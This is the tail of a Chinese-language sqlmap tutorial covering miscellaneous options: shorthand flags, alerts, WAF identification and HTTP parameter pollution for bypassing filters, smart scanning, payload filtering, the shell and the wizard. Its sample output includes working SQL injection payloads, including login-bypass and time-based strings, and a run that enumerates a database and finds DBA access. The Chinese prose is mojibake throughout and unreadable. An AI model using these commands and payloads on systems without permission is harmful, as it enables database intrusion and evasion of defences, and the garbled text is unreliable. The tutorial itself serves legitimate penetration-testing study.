[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 10 is out of range of the number of items in the select list.
<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
[xx:xx:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 6 is out of range of the number of items in the select list.
<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
[xx:xx:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 4 is out of range of the number of items in the select list.
<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
[xx:xx:17] [INFO] target URL appears to have 3 columns in query
16.鎸囧畾涓酱鍒?
鍙傛暟锛氣€損ivot-column
鏈夋椂锛堝鍦ㄥ井杞疭QL Server銆丼ybase鍜孲AP MaxDB涓級鐢变簬缂轰箯绫讳技鏈哄埗涓嶅彲浠ョ洿鎺ヤ娇鐢ㄥ亸绉籱,n鐨勬柟寮忓垪涓炬暟鎹〃璁板綍銆傚湪杩欑鎯呭喌涓嬶紝Sqlmap閫氳繃纭畾鏈€閫傚悎鐨勪腑杞村垪锛堟渶鐙壒鐨勫€硷級鏉ュ垪涓炬暟鎹紝涓酱鍒楃殑鍊肩◢鍚庣敤浜庢绱㈠叾浠栧垪鍊笺€?
濡傛灉鑷姩閫夋嫨澶辫触灏遍渶瑕佷娇鐢ㄨ鍙傛暟鎵嬪姩鎸囧畾涓酱鍒楋紝濡傦細鈥溾€損ivot-column=id鈥濄€?
17.淇濆瓨閫夐」鍒伴厤缃枃浠朵腑
鍙傛暟锛氣€搒ave
浣跨敤璇ュ弬鏁板彲浠ヤ繚瀛楽qlmap鍛戒护琛屽弬鏁板埌閰嶇疆鏂囦欢涓紝璇ユ枃浠跺彲缂栬緫骞朵笖鍙互浣跨敤鍙傛暟鈥?c鈥濆姞杞姐€傞厤缃枃浠舵槸INI鏍煎紡鐨勩€?
18.鍗囩骇Sqlmap
鍙傛暟锛氣€搖pdate
浣跨敤姝ゅ弬鏁板彲浠ュ崌绾qlmap锛屾樉鐒讹紝闇€瑕佽兘澶熻繛鎺ヤ簰鑱旂綉銆備竾涓€鎵ц澶辫触锛屽彲浠ュ湪Sqlmap瀹夎鐩綍涓墽琛屸€済it pull鈥濇潵鍗囩骇Sqlmap銆傚湪Windows涓病鏈塯it鍛戒护鍙互浣跨敤SmartGit涔嬬被鐨刧it瀹㈡埛绔€?
瀹為檯涓娾€溾€搖pdate鈥濆拰鈥済it pull鈥濅互鍚屾牱鐨勬柟寮忓崌绾qlmap锛岄兘鏄粠git浠撳簱涓幏鍙栨渶鏂版簮浠g爜銆?
寮虹儓寤鸿鍦ㄦ姤鍛奲ug鍓嶅厛鍗囩骇Sqlmap銆?
鍗佷節銆佹潅椤?/h3>
1.浣跨敤绠€鍐?
鍙傛暟锛?z
鏈変簺鍙傛暟缁勫悎鏄缁忓父鐢ㄥ埌鐨勶紝濡傗€溾€揵atch 鈥搑andom-agent 鈥搃gnore-proxy
鈥搕echnique=BEU鈥濓紝杩欐牱鍐欎竴澶т覆寰堜笉濂界湅锛屽湪Sqlmap涓紝鎻愪緵浜嗕竴绉嶇畝鍐欑殑鏂瑰紡鏉ョ缉鐭懡浠ら暱搴︺€?
鍒╃敤鍙傛暟鈥?z鈥濓紝姣忎釜鍙傛暟閮藉彲浠ュ彧鍐欏墠鍑犱釜瀛楁瘝锛屽鈥溾€揵atch鈥濆彲浠ョ畝鍐欎负鈥渂at鈥濄€傜畝鍐欑殑鍘熷垯鏄兘澶熸湁鎵€鍖哄埆銆佸搴旂殑鍙傛暟鍞竴灏辫銆傚悇涓弬鏁扮敤閫楀彿闅斿紑銆傚锛?
python sqlmap.py --batch --random-agent --ignore-proxy --technique=BEU -u "www.target.com/vuln.php?id=1"
python sqlmap.py -z "bat,randoma,ign,tec=BEU" -u "www.target.com/vuln.php?id=1"
python sqlmap.py --ignore-proxy --flush-session --technique=U --dump -D testdb -T users -u "www.target.com/vuln.php?id=1"
python sqlmap.py -z "ign,flu,bat,tec=U,dump,D=testdb,T=users" -u "www.target.com/vuln.php?id=1"
2.鍦ㄦ垚鍔熸娴嬪埌娉ㄥ叆鐐规椂鎶ヨ
鍙傛暟锛氣€揳lert
璇ュ弬鏁扮敤浜庡湪鎵惧埌鏂扮殑娉ㄥ叆鐐规椂鍙戝嚭璀︽姤锛屽悗璺熶竴涓敤浜庡彂鍑鸿鎶ョ殑鍛戒护锛屽锛?
python sqlmap.py -r data.txt --alert "notify-send '鎵惧埌婕忔礊浜?"
[18:59:36] [INFO] GET parameter 'couno' appears to be 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)' injectable (with --not-string="001")
[18:59:36] [INFO] executing alerting shell command(s) ('notify-send '鎵惧埌婕忔礊浜?')
涓婁緥涓敤浜庡彂鍑鸿鎶ョ殑鍛戒护鏄疷buntu涓殑notify-send鍛戒护銆?
3.璁剧疆闂鐨勫洖绛?
鍙傛暟锛氣€揳nswers
浣跨敤鈥溾€揵atch鈥濅互闈炰氦浜掓ā寮忚繍琛屾椂鎵€鏈夐棶棰橀兘浠ユ寜榛樿鍊间綔涓哄洖绛斻€傛湁鏃朵笉鎯充互榛樿鍊间负绛旀鍙堟兂浣跨敤闈炰氦浜掓ā寮忥紝姝ゆ椂鍙互浣跨敤鍙傛暟鈥溾€揳nswers鈥濆鐗瑰畾闂杩涜鍥炵瓟锛岃嫢鍥炵瓟澶氫釜闂锛屼互閫楀彿鍒嗛殧銆傚锛?
python sqlmap.py -u "http://192.168.22.128/sqlmap/mysql/get_int.php?id=1"--technique=E --answers="extending=N" --batch
[xx:xx:56] [INFO] testing for SQL injection on GET parameter 'id' heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
[xx:xx:56] [INFO] do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] N
4.鍦ㄦ垚鍔熸娴嬪埌娉ㄥ叆鐐规椂鍙戝嚭鈥滃槦鈥濆0
鍙傛暟锛氣€揵eep
浣跨敤姝ゅ弬鏁板彲浠ュ湪鎴愬姛妫€娴嬪埌娉ㄥ叆鐐规椂鍙戝嚭鈥滃槦鈥濆0銆備娇鐢ㄢ€?m鈥濅粠鏃ュ織鏂囦欢涓娴嬪ぇ閲忕綉绔欐椂璇ュ弬鏁颁細鏍煎鏈夌敤銆?
5.娓呴櫎Sqlmap鍒涘缓鐨勪复鏃惰〃鍜岃嚜瀹氫箟鍑芥暟
鍙傛暟锛氣€揷leanup
寮虹儓鎺ㄨ崘鍦ㄦ祴璇曠粨鏉熷悗浣跨敤姝ゅ弬鏁版竻闄qlmap鍒涘缓鐨勪复鏃惰〃鍜岃嚜瀹氫箟鍑芥暟锛孲qlmap浼氬敖鍙兘鍦版竻闄ゆ暟鎹簱绠$悊绯荤粺鍜屾枃浠剁郴缁熶笂鐨勫叆渚电棔杩广€?
6.妫€鏌ヤ緷璧?
鍙傛暟锛氣€揹ependencies
Sqlmap鐨勬湁浜涘姛鑳戒緷璧栫涓夋柟搴擄紝鍦ㄧ敤鍒版椂鍙戠幇娌℃湁杩欎簺搴撲細鎶ラ敊閫€鍑恒€備娇鐢ㄦ鍙傛暟鍙互妫€鏌ヤ緷璧栫殑绗笁鏂瑰簱鏄惁瀹夎锛屽锛?
python sqlmap.py --dependencies
[*] starting at 19:16:05
[19:16:05] [WARNING] sqlmap requires 'python-kinterbasdb' third-party library in order to directly connect to the DBMS 'Firebird'. Download from http://kinterbasdb.sourceforge.net/
[19:16:05] [WARNING] sqlmap requires 'python-pymssql' third-party library in order to directly connect to the DBMS 'Sybase'. Download from https://github.com/pymssql/pymssql
[19:16:05] [WARNING] sqlmap requires 'python cx_Oracle' third-party library in order to directly connect to the DBMS 'Oracle'. Download from http://cx-oracle.sourceforge.net/
[19:16:05] [WARNING] sqlmap requires 'python-psycopg2' third-party library in order to directly connect to the DBMS 'PostgreSQL'. Download from http://initd.org/psycopg/
[19:16:05] [WARNING] sqlmap requires 'python ibm-db' third-party library in order to directly connect to the DBMS 'IBM DB2'. Download from https://github.com/ibmdb/python-ibmdb
[19:16:05] [WARNING] sqlmap requires 'python jaydebeapi & python-jpype' third-party library in order to directly connect to the DBMS 'HSQLDB'. Download from https://pypi.python.org/pypi/JayDeBeApi/ & http://jpype.sourceforge.net/
[19:16:05] [WARNING] sqlmap requires 'python ibm-db' third-party library in order to directly connect to the DBMS 'Informix'. Download from https://github.com/ibmdb/python-ibmdb
[19:16:05] [WARNING] sqlmap requires 'python-pyodbc' third-party library in order to directly connect to the DBMS 'Microsoft Access'. Download from https://github.com/mkleehammer/pyodbc
[19:16:05] [WARNING] sqlmap requires 'python-pymssql' third-party library in order to directly connect to the DBMS 'Microsoft SQL Server'. Download from https://github.com/pymssql/pymssql
[19:16:05] [WARNING] sqlmap requires 'python-impacket' third-party library for out-of-band takeover feature. Download from http://code.google.com/p/impacket/
[19:16:05] [WARNING] sqlmap requires 'python-ntlm' third-party library if you plan to attack a web application behind NTLM authentication. Download from http://code.google.com/p/python-ntlm/
[19:16:05] [WARNING] sqlmap requires 'websocket-client' third-party library if you plan to attack a web application using WebSocket. Download from https://pypi.python.org/pypi/websocket-client/
[*] shutting down at 19:16:05
鍙互鐪嬪埌鎴戠己灏戠殑涓昏鏄敤浜庤繛鎺ユ暟鎹簱鐨勭涓夋柟搴撱€?
7.鍏抽棴褰╄壊杈撳嚭
鍙傛暟锛氣€揹isable-coloring
8.鎸囧畾浣跨敤Google dork缁撴灉鐨勬煇椤?
鍙傛暟锛氣€揼page
浣跨敤鍙傛暟鈥?g鈥濇椂榛樿榛樿閫夋嫨Google dork缁撴灉鐨勫墠100鏉″仛娉ㄥ叆娴嬭瘯銆傜粨鍚堜娇鐢ㄦ鍙傛暟锛屽彲浠ユ寚瀹氫娇鐢℅oogle dork缁撴灉鐨勬煇椤点€?
9.浣跨敤HTTP鍙傛暟姹℃煋
鍙傛暟锛氣€揾pp
HTTP鍙傛暟姹℃煋鏄粫杩嘩AF/IPS/IDS鐨勪竴绉嶆妧鏈紝璇︽儏瑙佹澶勩€傝繖涓€鎶€鏈拡瀵笰SP/IIS鍜孉SP.NET/IIS骞冲彴灏ゅ叾鏈夋晥銆傚鏋滄€€鐤戠洰鏍囧彈WAF/IPS/IDS淇濇姢锛屽彲浠ュ皾璇曠敤姝ゅ弬鏁拌繘琛岀粫杩囥€?
10.褰诲簳妫€娴媁AF/IPS/IDS
鍙傛暟锛氣€搃dentify-waf
Sqlmap鍙互璇嗗埆WAF/IPS/IDS浠ヤ究鐢ㄦ埛杩涜閽堝鎬ф搷浣滐紙濡傦細娣诲姞鈥溾€搕amper鈥濓級銆傜洰鍓峉qlmap鏀寔妫€娴?0澶氱涓嶅悓鐨刉AF/IPS/IDS锛屽Airlock鍜孊arracuda WAF绛夈€傛娴媁AF鐨勮剼鏈彲浠ュ湪瀹夎鐩綍鐨剋af鐩綍涓壘鍒般€?
涓嬩緥鐨勭洰鏍囨槸MySQL锛屽彈ModSecurity WAF淇濇姢锛?
python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" --identify-waf -v 3
[xx:xx:23] [INFO] testing connection to the target URL
[xx:xx:23] [INFO] heuristics detected web page charset 'ascii'
[xx:xx:23] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'USP Secure Entry Server (United Security Providers)'[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'BinarySEC Web Application Firewall (BinarySEC)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'NetContinuum Web Application Firewall (NetContinuum/Barracuda Networks)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Hyperguard Web Application Firewall (art of defence Inc.)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Cisco ACE XML Gateway (Cisco Systems)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'TrafficShield (F5 Networks)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Teros/Citrix Application Firewall Enterprise (Teros/Citrix Systems)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'KONA Security Solutions (Akamai Technologies)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Incapsula Web Application Firewall (Incapsula/Imperva)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'CloudFlare Web Application Firewall (CloudFlare)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Barracuda Web Application Firewall (Barracuda Networks)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'webApp.secure (webScurity)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Proventia Web Application Security (IBM)'
[xx:xx:23] [DEBUG] declared web page charset 'iso-8859-1'
[xx:xx:23] [DEBUG] page not found (404)
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'KS-WAF (Knownsec)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'NetScaler (Citrix Systems)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Jiasule Web Application Firewall (Jiasule)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'WebKnight Application Firewall (AQTRONIX)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'AppWall (Radware)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'ModSecurity: Open Source Web Application Firewall (Trustwave)'
[xx:xx:23] [CRITICAL] WAF/IDS/IPS identified 'ModSecurity: Open Source Web Application Firewall (Trustwave)'. Please consider usage of tamper scripts (option '--tamper')
鍙傛暟锛氣€搒kip-waf
榛樿鍦癝qlmap浼氬彂閫佽櫄鍋囩殑SQL娉ㄥ叆playload浠ヨ瘯鎺㈢洰鏍囨槸鍚︽湁淇濇姢鎺柦銆傚鏈変换浣曢棶棰橈紝鐢ㄦ埛鍙互浣跨敤鍙傛暟鈥溾€搒kip-waf鈥濇潵绂佺敤杩欎竴鎶€鏈€?
11.妯′豢鏅鸿兘鎵嬫満
鍙傛暟锛氣€搈obile
鏈変簺缃戠珯瀵规櫤鑳芥墜鏈哄拰妗岄潰鐜鐨勮繑鍥炴槸涓嶅悓鐨勩€傚綋闇€瑕佹祴璇曡繖绉嶇綉绔欑殑鏅鸿兘鎵嬫満椤甸潰鏃跺彲浠ヨ缃竴涓櫤鑳芥墜鏈虹殑User-Agent锛屾垨鑰呮洿绠€鍗曞湴锛屼娇鐢ㄦ鍙傛暟锛孲qlmap浼氬湪鎵ц鏃惰闂妯′豢鎴愭祦琛岀殑鎵嬫満涓殑鍝锛屽锛?
$ python sqlmap.py -u "http://www.target.com/vuln.php?id=1" --mobile
[...]
which smartphone do you want sqlmap to imitate through HTTP User-Agent header?
[1] Apple iPhone 4s (default)
[2] BlackBerry 9900
[3] Google Nexus 7
[4] HP iPAQ 6365
[5] HTC Sensation
[6] Nokia N97
[7] Samsung Galaxy S
> 1
[...]
12.绂荤嚎妯″紡锛堜粎浠呬娇鐢ㄤ細璇濇暟鎹級
鍙傛暟锛氣€搊ffline
娣诲姞姝ゅ弬鏁帮紝Sqlmap灏嗕粎浠呬娇鐢ㄤ互鍓嶅瓨鍌ㄧ殑浼氳瘽鏁版嵁鍋氭祴璇曡€屼笉鍚戠洰鏍囧彂閫佷换浣曟暟鎹寘銆?
13.鍦℅oogle dork涓睍绀洪〉闈㈡潈閲?
鍙傛暟锛氣€損age-rank
涓庡弬鏁扳€?g鈥濅竴璧蜂娇鐢紝杩欎細浣縎qlmap鍚慓oogle鍙戣捣鏇村鐨勮姹傚苟灞曠ず椤甸潰鏉冮噸銆?
14.浠庤緭鍑虹洰褰曚腑瀹夊叏绉婚櫎鎵€鏈夊唴瀹?
鍙傛暟锛氣€損urge-output
褰撶敤鎴锋兂瑕佸畨鍏ㄥ湴鍒犻櫎杈撳嚭鐩綍涓殑鎵€鏈夊唴瀹规椂浣跨敤姝ゅ弬鏁般€傛墍璋撳畨鍏ㄥ垹闄わ紝涓嶄粎浠呮槸鍒犻櫎锛岃€屾槸鍦ㄥ垹闄ゅ墠鍏堢敤闅忔満鏁版嵁瑕嗙洊鍘熸湁鏁版嵁锛岀敋鑷冲鏂囦欢鍚嶅拰鐩綍鍚嶄篃杩涜閲嶅懡鍚嶄互瑕嗙洊鏃у悕绉帮紝鎵€鏈夎鐩栧伐浣滃畬鎴愬悗鎵嶆墽琛屽垹闄ゃ€傛渶鍚庯紝杈撳嚭鐩綍涓細涓€鏃犳墍鏈夈€傚锛?
python sqlmap.py --purge-output -v 3
[*] starting at 19:51:36
[19:51:36] [DEBUG] cleaning up configuration parameters
[19:51:36] [INFO] purging content of directory '/home/werner/.sqlmap/output'...
[19:51:36] [DEBUG] changing file attributes
[19:51:36] [DEBUG] writing random data to files
[19:51:36] [DEBUG] truncating files
[19:51:36] [DEBUG] renaming filenames to random values
[19:51:36] [DEBUG] renaming directory names to random values
[19:51:36] [DEBUG] deleting the whole directory tree
[*] shutting down at 19:51:36
15.蹇€熸壂鎻?
鍙傛暟锛氣€搒mart
褰撴湁澶ч噺URL瑕佽繘琛屾祴璇曪紙濡傦細鈥?m鈥濓級锛岀洰鐨勬槸灏藉揩鎵惧嚭鍏朵腑瀛樺湪鐨勬煇浜涙敞鍏ョ偣鑰屾湁鎵€閬楁紡涔熸病鏈夊叧绯绘椂鍙互浣跨敤鈥溾€搒mart鈥濊繘琛屾鍚戝惎鍙戝紡鎵弿銆傛鏃跺彧鏈夎鏁版嵁搴撶鐞嗙郴缁熸姤閿欑殑鍙傛暟鎵嶄細鍋氳繘涓€姝ユ祴璇曪紝鍏朵綑URL鍧囪璺宠繃銆傚锛?
$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?ca=17&user=foo&id=1" --batch --smart
[...]
[xx:xx:14] [INFO] testing if GET parameter 'ca' is dynamic
[xx:xx:14] [WARNING] GET parameter 'ca' does not appear dynamic
[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'ca' might not be injectable
[xx:xx:14] [INFO] skipping GET parameter 'ca'
[xx:xx:14] [INFO] testing if GET parameter 'user' is dynamic
[xx:xx:14] [WARNING] GET parameter 'user' does not appear dynamic
[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'user' might not be injectable
[xx:xx:14] [INFO] skipping GET parameter 'user'
[xx:xx:14] [INFO] testing if GET parameter 'id' is dynamic
[xx:xx:14] [INFO] confirming that GET parameter 'id' is dynamic
[xx:xx:14] [INFO] GET parameter 'id' is dynamic
[xx:xx:14] [WARNING] reflective value(s) found and filtering out
[xx:xx:14] [INFO] heuristic (basic) test shows that GET parameter 'id' might be
injectable (possible DBMS: 'MySQL')
[xx:xx:14] [INFO] testing for SQL injection on GET parameter 'id' heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] Y
[xx:xx:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[xx:xx:14] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[xx:xx:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[xx:xx:14] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[xx:xx:14] [INFO] testing 'MySQL inline queries'
[xx:xx:14] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[xx:xx:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[xx:xx:14] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[xx:xx:24] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[xx:xx:24] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found
[xx:xx:24] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[xx:xx:24] [INFO] target URL appears to have 3 columns in query
[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
[...]
16.閫氳繃鍏抽敭璇嶄娇鐢ㄦ垨璺宠繃payload
鍙傛暟锛氣€搕est-filter
鑻ュ彧鎯充娇鐢ㄥ寘鍚叧閿瘝鈥淩OW鈥濈殑payload鍙娇鐢ㄥ弬鏁扳€溾€搕est-filter=ROW鈥濄€備笅闈㈡槸浠ysql涓虹洰鏍囩殑渚嬪瓙锛?
python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" --batch --test-filter=ROW
- 1
- 2
[xx:xx:39] [INFO] GET parameter 鈥檌d鈥?is dynamic
[xx:xx:39] [WARNING] reflective value(s) found and filtering out
[xx:xx:39] [INFO] heuristic (basic) test shows that GET parameter 鈥檌d鈥?might be injectable (possible DBMS: 鈥橫ySQL鈥?
[xx:xx:39] [INFO] testing for SQL injection on GET parameter 鈥檌d鈥? [xx:xx:39] [INFO] testing 鈥橫ySQL >= 4.1 AND error-based - WHERE or HAVING clause鈥? [xx:xx:39] [INFO] GET parameter 鈥檌d鈥?is 鈥橫ySQL >= 4.1 AND error-based - WHERE or HAVING clause鈥?injectable GET parameter 鈥檌d鈥?is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 3 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 4.1 AND error-based - WHERE or HAVING clause
Payload: id=1 AND ROW(4959,4971)>(SELECT COUNT(*),CONCAT(0x3a6d70623a,(SELECT (CASE WHEN (4959=4959) THEN 1 ELSE 0 END)),0x3a6b7a653a,FLOOR(RAND(0)*2))x FROM (SELECT 4706 UNION SELECT 3536 UNION SELECT 7442 UNION SELECT 3470)a GROUP BY x)
---
鍙傛暟锛氣€搕est-skip
鑻ヤ笉鎯充娇鐢ㄥ寘鍚叧閿瘝鈥淏ENCHMARK鈥濈殑payload鍙娇鐢ㄥ弬鏁扳€溾€搕est-skip=BENCHMARK鈥濄€?
17.浜や簰寮廠qlmap Shell
鍙傛暟锛氣€搒qlmap-shell
浣跨敤姝ゅ弬鏁板彲浠ユ墦寮€涓€涓氦浜掑紡鐨凷qlmap Shell锛屾敮鎸佸巻鍙茶褰曘€傚锛?
[email聽protected]:~$ sqlmap --sqlmap-shell
___
__H__
___ ___[.]_____ ___ ___ {1.1.10#stable}
|_ -| . ["] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
sqlmap-shell> -u "192.168.56.102"
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 20:22:46
[20:22:46] [INFO] testing connection to the target URL
[20:22:46] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[20:22:46] [INFO] testing if the target URL is stable
[20:22:47] [INFO] target URL is stable
[20:22:47] [CRITICAL] no parameter(s) found for testing in the provided data (e.g. GET parameter 'id' in 'www.site.com/index.php?id=1')
[*] shutting down at 20:22:47
___
__H__
___ ___[.]_____ ___ ___ {1.1.10#stable}
|_ -| . ["] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
sqlmap-shell> exit
18.涓哄垵瀛﹁€呭噯澶囩殑绠€鍗曞悜瀵?
鍙傛暟锛氣€搘izard
Sqlmap鐗瑰湴涓哄垵瀛﹁€呭噯澶囦簡涓€涓湁鐫€灏藉彲鑳藉皯闂鐨勫伐浣滄祦鐨勫悜瀵笺€傜敤鎴疯緭鍏ョ洰鏍囧悗鑻ヤ竴鐩存寜鍥炶溅閫夋嫨榛樿鍥炵瓟鍒板伐浣滄祦鐨勬渶鍚庝篃浼氬緱鍒颁竴涓纭殑缁撴灉銆傚锛?
[email聽protected]:~$ sqlmap --wizard
___
__H__
___ ___["]_____ ___ ___ {1.1.10#stable}
|_ -| . [)] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 20:39:41
[20:39:41] [INFO] starting wizard interface
Please enter full target URL (-u): http://192.168.56.102/login.php
POST data (--data) [Enter for None]: username=001&password=003
Injection difficulty (--level/--risk). Please choose:
[1] Normal (default)
[2] Medium
[3] Hard
> 1
Enumeration (--banner/--current-user/etc). Please choose:
[1] Basic (default)
[2] Intermediate
[3] All
> 1
sqlmap is running, please wait..
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
Payload: username=001%' OR NOT 2143=2143#&password=003
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (comment)
Payload: username=001%' OR SLEEP(5)#&password=003
---
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS operating system: Linux Ubuntu
back-end DBMS: MySQL >= 5.0.12
banner: '5.5.50-0ubuntu0.14.04.1'
current user: '[email聽protected]'
current database: 'DSSchool'
current user is DBA: True
[*] shutting down at 20:40:07
鎬荤粨
瀹屾暣闃呰Sqlmap瀹樻柟鎵嬪唽鍚庣粓浜庡Sqlmap鏈変簡涓€涓緝涓哄叏闈㈢殑璁よ瘑銆備互鍓嶅彧鏄湁鎵€鑰抽椈锛岀幇鍦ㄥ垏瀹炲湴鎰熷彈鍒颁簡Sqlmap鐨勫己澶э紝涔熸剤鍔犳暚浣㏒qlmap鐨勪袱浣嶄綔鑰咃細- Bernardo Damele A. G. (@inquisb)
- Miroslav Stampar (@stamparm)